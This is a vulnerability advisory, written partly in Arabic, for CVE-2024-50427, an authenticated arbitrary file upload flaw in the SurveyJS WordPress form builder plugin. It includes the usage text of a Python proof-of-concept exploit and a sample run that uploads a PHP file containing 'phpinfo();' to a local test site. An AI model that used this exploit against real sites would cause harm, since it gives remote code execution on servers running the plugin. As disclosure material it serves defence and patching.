
SurveyJS: Drag & Drop WordPress Form Builder <= 1.9.136 - مُصادَق عليه (Subscriber+) رفع ملفات تعسفي
SurveyJS: Drag & Drop منشئ نماذج WordPress <= 1.9.136 - رفع ملفات تعسفي للمستخدمين الموثَّقين (بصلاحية مشترك فأعلى)
المكون الإضافي SurveyJS: Drag & Drop منشئ نماذج WordPress لإنشاء وتنسيق وتضمين نماذج متعددة بأي تعقيد معرض لخطر رفع الملفات التعسفي بسبب نقص التحقق من نوع الملف في جميع الإصدارات حتى 1.9.136. وهذا يتيح للمهاجمين الموثَّقين، بصلاحية مشترك فأعلى، رفع ملفات تعسفي على خادم الموقع المتأثر مما قد يؤدي إلى تنفيذ كود عن بعد.
Published: 2024-10-24 00:00:00
CVE: CVE-2024-50427
CVSS: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
CVSS Score: 8.8
Slugs: surveyjs
usage: CVE-2024-50427.py [-h] [--code CODE] url username password
Upload a PHP file to a WordPress site.
positional arguments:
url The URL of the WordPress site (e.g., http://example.com)
username Your WordPress username
password Your WordPress password
options:
-h, --help show this help message and exit
--code CODE PHP code to execute
$ python3 CVE-2024-50427.py http://kubernetes.docker.internal [email protected] user --code "phpinfo();"
Login successful.
File uploaded successfully.
http://kubernetes.docker.internal/wp-content/uploads/surveyjs/158718452672e02bd1d7212.25114025.php